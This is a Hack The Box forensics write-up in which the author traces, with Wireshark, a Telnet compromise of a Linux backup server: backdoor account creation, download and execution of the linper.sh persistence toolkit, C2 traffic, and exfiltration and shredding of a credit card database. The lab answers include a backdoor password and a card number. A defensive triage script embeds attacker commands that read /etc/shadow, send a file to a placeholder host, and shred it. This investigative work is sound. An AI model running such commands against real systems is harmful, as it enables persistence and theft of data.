Hack The Box Network Forensics & Traffic Analysis Very Easy Apr '26

Telly

Analyzed a network capture from a compromised Linux backup server flagged for data exfiltration. Traced Telnet-based exploitation via CVE-2026-24061, followed TCP streams to map attacker activity including backdoor account creation, linper.sh persistence toolkit deployment, and exfiltration of a credit card database that was shredded by the attacker afterward.

Difficulty: Very Easy | Completion: 100% | Platform: Hack The Box | Tools used: Wireshark

01 Protocol Analysis & Initial Findings

let's first check the protocol hierarchy to get a feel for what we're dealing with.

Protocol hierarchy showing Telnet traffic

right away we see Telnet traffic. Telnet transmits everything in plaintext, so this is already a red flag.

Wireshark filter showing Telnet packets

filtering for Telnet, we can see that 192.168.72.136 is sending commands to 192.168.72.131. looking at the command logs, something unusual is going on.

Telnet command logs showing unusual activity

why would someone already running as root add a random account? at this point we know .131 is the compromised host. let's follow the TCP stream to see the full picture.

02 TCP Stream Investigation

following the TCP stream, we can see passwords being read.

TCP stream showing passwords being read

and a lot of directory recon.

TCP stream showing directory recon

continuing through the stream, the attacker downloads a file from GitHub.

TCP stream showing GitHub download of linper.sh

researching linper.sh, it is a Linux persistence toolkit from the linper GitHub repo published under the montysecurity account. it automates setting up persistence mechanisms like cron jobs, SSH backdoors, and startup script modifications. the attacker then ran it.

TCP stream showing linper.sh execution

we also see the attacker found a database called credit-cards-25-blackfriday.db, exfiltrated it, and then shredded it to cover tracks.

TCP stream showing database discovery and exfiltration

TCP stream showing database shredded after exfiltration

03 Exploitation Details

Q1. What CVE is associated with the vulnerability exploited in the Telnet protocol?

we know the attacker got root access on .131. looking at the command the attacker used to connect via Telnet confirms the exploit method.

Telnet exploit command used by attacker

CVE article confirming CVE-2026-24061

Answer: CVE-2026-24061

Q2. When was the Telnet vulnerability successfully exploited?

the timestamp is visible in the same frame.

Wireshark packet showing exploit timestamp

Answer: 2026-01-27 10:39:28

Q3. What is the hostname of the targeted server?

visible from the TCP stream investigation earlier.

Answer: backup-secondary

Q4. What username and password were set for the backdoor account?

we saw this in the TCP stream. the attacker created an account called cleanupsvc with a password.

Answer: cleanupsvc:YouKnowWhoiam69

Q5. What was the full command the attacker used to download the persistence script?

visible in the TCP stream when we saw the attacker pull linper.sh from GitHub. since this is a simple download, wget is the tool used.

Answer: wget hxxps://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh

04 C2, Exfiltration & Data Recovery

Q6. What is the C2 IP address used for remote access persistence?

checking the traffic around the time linper.sh was executed, we see new outbound connections. that is where the attacker is sending the output of the commands.

Wireshark traffic showing C2 IP addresses after linper.sh execution

Answer: 91.99.25.54

Q7. At what time was the sensitive database file exfiltrated?

visible from the earlier TCP stream investigation.

Wireshark packet showing database exfiltration timestamp

Answer: 2026-01-27 10:49:54

Q8. Find the credit card number for a customer named Quinn Harris.

to get this, we export objects from Wireshark to recover the database file, then open it and look up Quinn Harris.

Wireshark export objects to retrieve database file

Database file showing Quinn Harris credit card number

Answer: 5312269047781209

Key Takeaways
  • Telnet in a protocol hierarchy is an immediate red flag. it transmits everything in plaintext including credentials, so following the TCP stream gives you a full read of every command the attacker ran
  • check protocol hierarchy first before diving into individual packets. it gives you a quick snapshot of what's in use and helps you know where to focus
  • attackers don't always write custom tools. linper.sh is a publicly available persistence toolkit. knowing common offensive scripts like this helps you recognize them faster in the field
  • file deletion right after a suspicious transfer is a strong indicator of exfiltration. shredding is a cleanup step to remove evidence and make recovery harder
  • exporting objects from Wireshark lets you recover files transmitted over the wire, including databases the attacker exfiltrated
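as an added example (my own code, not part of the lab or the linper project), here are the takeaways above turned into a small triage script that runs over a Telnet command log reconstructed from a followed stream, in 'date time src dst command' form. the log lines are constructed to mirror the capture; EXFIL_HOST and the /backups path are placeholders, and the 5 minute transfer-to-shred window is an assumption.

```python
import os
import re
from datetime import datetime, timedelta

# Constructed sample in 'date time src dst command' form, modelled on the followed
# stream. EXFIL_HOST and the /backups path are placeholders, not values from the lab.
SAMPLE_LOG = """\
2026-01-27 10:39:28 192.168.72.136 192.168.72.131 id
2026-01-27 10:40:35 192.168.72.136 192.168.72.131 cat /etc/shadow
2026-01-27 10:41:15 192.168.72.136 192.168.72.131 useradd -m cleanupsvc
2026-01-27 10:41:40 192.168.72.136 192.168.72.131 wget hxxps://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh
2026-01-27 10:42:05 192.168.72.136 192.168.72.131 bash linper.sh
2026-01-27 10:49:54 192.168.72.136 192.168.72.131 scp /backups/credit-cards-25-blackfriday.db EXFIL_HOST:/tmp/
2026-01-27 10:50:30 192.168.72.136 192.168.72.131 shred -u /backups/credit-cards-25-blackfriday.db
"""

PERSISTENCE_TOOLS = ("linper.sh",)                     # script named in the writeup
TRANSFER_TOOLS = ("scp", "curl", "wget", "nc", "ftp")  # commands that move files
ACCOUNT_RE = re.compile(r"\b(?:useradd|adduser)\b(?:\s+-\S+)*\s+(\S+)")

def parse_log(text):
    """Split each line into a datetime plus src, dst and the command string."""
    events = []
    for line in text.splitlines():
        date, clock, src, dst, cmd = line.split(" ", 4)
        ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S")
        events.append({"ts": ts, "src": src, "dst": dst, "cmd": cmd})
    return events

def analyze(events, window=timedelta(minutes=5)):
    """Flag new accounts, known persistence scripts, and transfer-then-shred."""
    findings = []
    for e in events:
        argv = e["cmd"].split()
        m = ACCOUNT_RE.search(e["cmd"])
        if m:
            findings.append({"kind": "backdoor_account", "ts": e["ts"], "detail": m.group(1)})
        if any(tool in e["cmd"] for tool in PERSISTENCE_TOOLS):
            findings.append({"kind": "persistence_tool", "ts": e["ts"], "detail": e["cmd"]})
        if argv[0] == "shred":
            target = os.path.basename(argv[-1])
            # a shred shortly after a transfer of the same file is the exfil signature
            for prior in events:
                if (timedelta(0) < e["ts"] - prior["ts"] <= window
                        and prior["cmd"].split()[0] in TRANSFER_TOOLS and target in prior["cmd"]):
                    findings.append({"kind": "exfil_then_shred", "ts": prior["ts"], "detail": target})
                    break
    return findings
```

on the sample the script reports the cleanupsvc account, both the download and the execution of linper.sh, and the database transfer at 10:49:54 followed by its shred.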

now that i have a process for investigating packets through Wireshark, i'm getting a solid understanding of how attacks play out across a timeline. there was less manual searching on my end and more structured filtering compared to earlier labs. good lab overall.